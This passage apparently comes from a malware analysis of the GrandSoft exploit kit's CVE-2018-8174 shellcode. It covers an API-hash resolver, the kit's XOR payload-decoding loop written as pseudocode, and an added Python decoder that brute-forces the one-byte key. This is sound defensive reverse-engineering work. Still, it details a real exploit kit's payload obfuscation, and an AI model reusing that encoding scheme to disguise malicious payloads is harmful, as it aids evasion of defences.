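               "kernelbase.dll", "msvcrt.dll", "ntdll.dll"]


def build_table(names: Iterable[str]) -> Dict[int, str]:
    """Map ror14 hash -> name so hash constants seen in the shellcode can be resolved."""
    return {ror14_add_hash32(n): n for n in names}


def resolve(table: Dict[int, str], h: int) -> Optional[str]:
    """Look up a 32-bit hash constant pulled from the shellcode; None if unknown."""
    return table.get(h & MASK32)


if __name__ == "__main__":
    table = build_table(KNOWN_NAMES)
    for h, n in sorted(table.items()):
        print(f"0x{h:08x}  {n}")
```

Extend KNOWN_NAMES with an export list dumped from the relevant DLLs to resolve every hash the shellcode carries.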
The shellcode uses the GetTickCount function to generate the key.
The decoding algorithm itself is unchanged from the VBScript version.
Pseudocode is as follows:
function decode_payload($enc_binary, $key) {
    $data = '';
    for ($i = 0; $i < strlen($enc_binary); $i++) {
        // per-byte key update: add 0xAA, keep the low byte, then XOR with 0x48
        $key = ($key + 0xAA) & 0xFF;
        $key = $key ^ 0x48;
        $data .= chr(ord($enc_binary[$i]) ^ $key);
    }
    return $data;
}
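A Python decoder for a captured payload, added here for analysis; it is not code from the exploit kit or the original post. Only the per-byte key update comes from the page; the function names and the sample bytes are constructed. It goes one step beyond the page's loop: because the update masks the key to 8 bits, only 256 keystreams exist, so the key can be recovered from a captured sample by checking for the PE "MZ" header even when the URL parameter is unavailable.

```python
"""GrandSoft payload decoder (added example, not the exploit kit's code)."""
from typing import Optional


def keystream(key: int, length: int) -> bytes:
    """Expand the initial key into the per-byte XOR keystream.

    The update is taken from the page: key = ((key + 0xAA) & 0xFF) ^ 0x48.
    Only key & 0xFF ever influences the output, so the GetTickCount-derived
    value is effectively a one-byte key.
    """
    out = bytearray()
    for _ in range(length):
        key = ((key + 0xAA) & 0xFF) ^ 0x48
        out.append(key)
    return bytes(out)


def decode(enc: bytes, key: int) -> bytes:
    """XOR the captured payload with the keystream (symmetric, so it also encodes)."""
    return bytes(b ^ k for b, k in zip(enc, keystream(key, len(enc))))


def recover_key(enc: bytes, magic: bytes = b"MZ") -> Optional[int]:
    """Brute-force the 256 possible keys against the expected file magic.

    The first keystream byte is a bijection of key & 0xFF, so at most one
    candidate can produce `magic`; returns None if no candidate does.
    """
    for cand in range(256):
        if decode(enc[:len(magic)], cand) == magic:
            return cand
    return None


if __name__ == "__main__":
    # Constructed sample: the start of a PE header, encoded with key 0x1234.
    plain = b"MZ\x90\x00\x03\x00\x00\x00"
    captured = decode(plain, 0x1234)
    key = recover_key(captured)
    print(f"recovered key byte: {key:#04x}" if key is not None else "no key found")
    print(decode(captured, key) if key is not None else b"")
```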
Conclusion
GrandSoft has adopted CVE-2018-8174, which may make it a bit more powerful. The shellcode is somewhat distinctive. Enjoy analyzing the shellcode!